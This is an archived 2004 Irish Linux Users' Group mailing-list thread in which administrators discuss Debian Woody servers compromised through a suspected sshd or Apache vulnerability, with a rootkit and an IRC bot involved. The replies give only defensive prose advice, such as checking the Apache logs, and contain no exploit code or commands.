The second box that was hacked was a gateway machine to a private
network and the *only* listening port was ssh!
When I saw the first machine initially, I was convinced it was a
apache/php problem... until I found the second machine was compromised.
On Wed, Aug 04, 2004 at 09:04:26PM +0100, Ken Gilmour wrote:
> On Wed, 4 Aug 2004 15:09:15 +0100, Eoin Ryan wrote:
> > Hi all,
> > There appears to be a new exploit of sshd on Debian Woody. Ssh
> > version:
> > SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3
>> Ok this is the conclusion i have come to on this problem. I cannot find
> any patches on that and none of my security team seem to know anything
> about it which is quite unusual, it's also unusual for Debian to go that
> long without issuing a patch.
>> A few months ago we discovered a root kit which looks similar to this...
> same IRC bot etc. It was actually an apache vulnerability at the time
> where the exploit was. You can find this by looking at your apache logs.
>> What could be done was that you could hit the apache vulnerability,
> execute remote code and setup an ssh daemon on another port, that's when
> you will see the failed ssh logins, almost the exact same deal.
>> If the daemon is stopped it will keep coming back. There was a process
> running similar to kscand (similar, cant remember exact name). once that
> was stopped ssh stopped coming back.
>> So check your apache logs... if there is nothing unusual (god forbid)
> then it may be a brand new vulnerability.
Maintained by the ILUG website team. The aim of Linux.ie is to
support and help commercial and private users of Linux in Ireland. You can
display ILUG news in your own webpages, read backend
information to find out how. Networking services kindly provided by HEAnet, server kindly donated by
Dell. Linux is a trademark of Linus Torvalds,
used with permission. No penguins were harmed in the production or maintenance
of this highly praised website. Looking for the
Indian Linux Users' Group? Try here. If you've read all this and aren't a lawyer: you should be!